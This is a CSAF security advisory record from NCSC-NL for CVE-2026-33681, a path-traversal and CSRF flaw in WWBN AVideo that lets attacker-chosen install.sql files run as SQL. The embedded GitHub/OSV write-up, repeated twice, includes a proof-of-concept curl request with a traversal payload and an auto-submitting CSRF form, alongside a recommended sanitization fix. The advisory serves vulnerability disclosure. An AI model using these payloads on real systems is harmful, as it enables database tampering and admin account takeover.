{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33681",
        "tracking": {
            "current_release_date": "2026-03-26T00:47:45.708039Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33681",
            "initial_release_date": "2026-03-24T13:51:29.945877Z",
            "revision_history": [
                {
                    "date": "2026-03-24T13:51:29.945877Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T13:51:40.830653Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T14:25:38.288936Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T14:25:40.993153Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:51:31.585556Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T21:37:18.017361Z",
                    "number": "6",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:32.741126Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:26:50.454392Z",
                    "number": "8",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-25T18:26:58.071906Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T20:59:56.461808Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T20:59:58.182983Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:47:42.371814Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (4).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "12"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=26.0",
                                "product": {
                                    "name": "vers:unknown/<=26.0",
                                    "product_id": "CSAFPID-5893889",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33681",
            "cwe": {
                "id": "CWE-22",
                "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database. Commit 81b591c509835505cb9f298aa1162ac64c4152cb contains a patch.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33681"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database. Commit 81b591c509835505cb9f298aa1162ac64c4152cb contains a patch.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33681.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database.\n\n## Details\n\nThe vulnerable data flow:\n\n**1. Entry point** — `objects/pluginRunDatabaseScript.json.php:21`:\n```php\n$fileName = Plugin::getDatabaseFileName($_POST['name']);\n```\n\n**2. \"Sanitization\"** — `objects/plugin.php:343-354`:\n```php\npublic static function getDatabaseFileName($pluginName)\n{\n    global $global;\n    $pluginName = AVideoPlugin::fixName($pluginName);  // line 347 — no-op\n    $dir = $global['systemRootPath'] . \"plugin\";\n    $filename = $dir . DIRECTORY_SEPARATOR . $pluginName . DIRECTORY_SEPARATOR . \"install\" . DIRECTORY_SEPARATOR . \"install.sql\";\n    if (!file_exists($filename)) {\n        return false;\n    }\n    return $filename;\n}\n```\n\n**3. The \"fix\"** — `plugin/AVideoPlugin.php:3184-3190`:\n```php\npublic static function fixName($name)\n{\n    if ($name === 'Programs') {\n        return 'PlayLists';\n    }\n    return $name;  // Returns input unchanged for all other values\n}\n```\n\n**4. SQL execution** — `objects/pluginRunDatabaseScript.json.php:24-36`:\n```php\n$lines = file($fileName);\nforeach ($lines as $line) {\n    // ...\n    if (!$global['mysqli']->query($templine)) {\n        $obj->msg = ('Error performing query \\'<strong>' . $templine . '\\': ' . $global['mysqli']->error);\n        die($templine.' 
'.json_encode($obj));  // Leaks file content + SQL error\n    }\n}\n```\n\nThe sibling endpoint `pluginRunUpdateScript.json.php` correctly routes through `AVideoPlugin::loadPlugin()` which sanitizes the name with `preg_replace('/[^0-9a-z_]/i', '', $name)` at `AVideoPlugin.php:395`. The vulnerable endpoint bypasses this sanitization entirely.\n\nAdditionally, the endpoint lacks CSRF token validation. The related `pluginImport.json.php` properly checks `isGlobalTokenValid()`, but `pluginRunDatabaseScript.json.php` does not, making it exploitable via cross-site request forgery against an authenticated admin.\n\n## PoC\n\n**Step 1: Direct exploitation (as admin)**\n\n```bash\n# Traverse to another plugin's install.sql (e.g., from CustomPlugin to LiveLinks)\ncurl -s -b \"PHPSESSID=<admin_session>\" \\\n  -d \"name=../plugin/LiveLinks\" \\\n  \"https://target.com/objects/pluginRunDatabaseScript.json.php\"\n```\n\nThis resolves to: `{root}/plugin/../plugin/LiveLinks/install/install.sql` and executes its SQL.\n\n**Step 2: CSRF exploitation (no direct admin access needed)**\n\nHost the following HTML on an attacker-controlled page and trick an admin into visiting it:\n\n```html\n<html>\n<body>\n<form action=\"https://target.com/objects/pluginRunDatabaseScript.json.php\" method=\"POST\" id=\"csrf\">\n  <input type=\"hidden\" name=\"name\" value=\"../../attacker-controlled-path\" />\n</form>\n<script>document.getElementById('csrf').submit();</script>\n</body>\n</html>\n```\n\n**Step 3: Information disclosure via error messages**\n\nIf the traversed SQL file contains invalid SQL, lines 32-33 leak the raw file content in the error response:\n```json\n{\"error\":true,\"msg\":\"Error performing query '<strong>FILE CONTENT HERE': MySQL error...\"}\n```\n\n## Impact\n\n- **SQL injection via file inclusion**: An attacker can execute arbitrary SQL from any `install/install.sql` file reachable via path traversal, potentially creating admin accounts, modifying data, or extracting 
sensitive information.\n- **Information disclosure**: SQL execution errors leak raw file contents and MySQL error messages in the HTTP response.\n- **CSRF amplification**: The lack of CSRF protection means an external attacker can exploit this vulnerability by tricking an admin into visiting a malicious page, without needing direct admin credentials.\n- **Chaining potential**: If combined with any file-write primitive (e.g., GHSA-v8jw-8w5p-23g3, the plugin ZIP extraction RCE), an attacker can write a malicious `install.sql` file and then execute it via this endpoint.\n\n## Recommended Fix\n\nApply the same sanitization used by `loadPlugin()` to strip path traversal characters, and add CSRF token validation:\n\n```php\n// In objects/pluginRunDatabaseScript.json.php, after line 14:\n\n// Add CSRF protection\nif (!isGlobalTokenValid()) {\n    die('{\"error\":\"' . __(\"Invalid token\") . '\"}');\n}\n\n// Sanitize plugin name before use (line 21)\n$pluginName = trim(preg_replace('/[^0-9a-z_]/i', '', $_POST['name']));\n$fileName = Plugin::getDatabaseFileName($pluginName);\n```\n\nAlternatively, fix `AVideoPlugin::fixName()` to apply proper sanitization for all callers:\n\n```php\npublic static function fixName($name)\n{\n    if ($name === 'Programs') {\n        $name = 'PlayLists';\n    }\n    return trim(preg_replace('/[^0-9a-z_]/i', '', $name));\n}\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-3hwv-x8g3-9qpr"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database.\n\n## Details\n\nThe vulnerable data flow:\n\n**1. Entry point** — `objects/pluginRunDatabaseScript.json.php:21`:\n```php\n$fileName = Plugin::getDatabaseFileName($_POST['name']);\n```\n\n**2. \"Sanitization\"** — `objects/plugin.php:343-354`:\n```php\npublic static function getDatabaseFileName($pluginName)\n{\n    global $global;\n    $pluginName = AVideoPlugin::fixName($pluginName);  // line 347 — no-op\n    $dir = $global['systemRootPath'] . \"plugin\";\n    $filename = $dir . DIRECTORY_SEPARATOR . $pluginName . DIRECTORY_SEPARATOR . \"install\" . DIRECTORY_SEPARATOR . \"install.sql\";\n    if (!file_exists($filename)) {\n        return false;\n    }\n    return $filename;\n}\n```\n\n**3. The \"fix\"** — `plugin/AVideoPlugin.php:3184-3190`:\n```php\npublic static function fixName($name)\n{\n    if ($name === 'Programs') {\n        return 'PlayLists';\n    }\n    return $name;  // Returns input unchanged for all other values\n}\n```\n\n**4. SQL execution** — `objects/pluginRunDatabaseScript.json.php:24-36`:\n```php\n$lines = file($fileName);\nforeach ($lines as $line) {\n    // ...\n    if (!$global['mysqli']->query($templine)) {\n        $obj->msg = ('Error performing query \\'<strong>' . $templine . '\\': ' . $global['mysqli']->error);\n        die($templine.' 
'.json_encode($obj));  // Leaks file content + SQL error\n    }\n}\n```\n\nThe sibling endpoint `pluginRunUpdateScript.json.php` correctly routes through `AVideoPlugin::loadPlugin()` which sanitizes the name with `preg_replace('/[^0-9a-z_]/i', '', $name)` at `AVideoPlugin.php:395`. The vulnerable endpoint bypasses this sanitization entirely.\n\nAdditionally, the endpoint lacks CSRF token validation. The related `pluginImport.json.php` properly checks `isGlobalTokenValid()`, but `pluginRunDatabaseScript.json.php` does not, making it exploitable via cross-site request forgery against an authenticated admin.\n\n## PoC\n\n**Step 1: Direct exploitation (as admin)**\n\n```bash\n# Traverse to another plugin's install.sql (e.g., from CustomPlugin to LiveLinks)\ncurl -s -b \"PHPSESSID=<admin_session>\" \\\n  -d \"name=../plugin/LiveLinks\" \\\n  \"https://target.com/objects/pluginRunDatabaseScript.json.php\"\n```\n\nThis resolves to: `{root}/plugin/../plugin/LiveLinks/install/install.sql` and executes its SQL.\n\n**Step 2: CSRF exploitation (no direct admin access needed)**\n\nHost the following HTML on an attacker-controlled page and trick an admin into visiting it:\n\n```html\n<html>\n<body>\n<form action=\"https://target.com/objects/pluginRunDatabaseScript.json.php\" method=\"POST\" id=\"csrf\">\n  <input type=\"hidden\" name=\"name\" value=\"../../attacker-controlled-path\" />\n</form>\n<script>document.getElementById('csrf').submit();</script>\n</body>\n</html>\n```\n\n**Step 3: Information disclosure via error messages**\n\nIf the traversed SQL file contains invalid SQL, lines 32-33 leak the raw file content in the error response:\n```json\n{\"error\":true,\"msg\":\"Error performing query '<strong>FILE CONTENT HERE': MySQL error...\"}\n```\n\n## Impact\n\n- **SQL injection via file inclusion**: An attacker can execute arbitrary SQL from any `install/install.sql` file reachable via path traversal, potentially creating admin accounts, modifying data, or extracting 
sensitive information.\n- **Information disclosure**: SQL execution errors leak raw file contents and MySQL error messages in the HTTP response.\n- **CSRF amplification**: The lack of CSRF protection means an external attacker can exploit this vulnerability by tricking an admin into visiting a malicious page, without needing direct admin credentials.\n- **Chaining potential**: If combined with any file-write primitive (e.g., GHSA-v8jw-8w5p-23g3, the plugin ZIP extraction RCE), an attacker can write a malicious `install.sql` file and then execute it via this endpoint.\n\n## Recommended Fix\n\nApply the same sanitization used by `loadPlugin()` to strip path traversal characters, and add CSRF token validation:\n\n```php\n// In objects/pluginRunDatabaseScript.json.php, after line 14:\n\n// Add CSRF protection\nif (!isGlobalTokenValid()) {\n    die('{\"error\":\"' . __(\"Invalid token\") . '\"}');\n}\n\n// Sanitize plugin name before use (line 21)\n$pluginName = trim(preg_replace('/[^0-9a-z_]/i', '', $_POST['name']));\n$fileName = Plugin::getDatabaseFileName($pluginName);\n```\n\nAlternatively, fix `AVideoPlugin::fixName()` to apply proper sanitization for all callers:\n\n```php\npublic static function fixName($name)\n{\n    if ($name === 'Programs') {\n        $name = 'PlayLists';\n    }\n    return trim(preg_replace('/[^0-9a-z_]/i', '', $name));\n}\n```",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-3hwv-x8g3-9qpr.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00041",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.3",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5893889",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33681"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33681.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-3hwv-x8g3-9qpr"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-3hwv-x8g3-9qpr.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/81b591c509835505cb9f298aa1162ac64c4152cb"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3hwv-x8g3-9qpr"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33681"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/advisories/GHSA-v8jw-8w5p-23g3"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-3hwv-x8g3-9qpr"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 7.2,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929",
                        "CSAFPID-5893889"
                    ]
                }
            ],
            "title": "CVE-2026-33681"
        }
    ]
}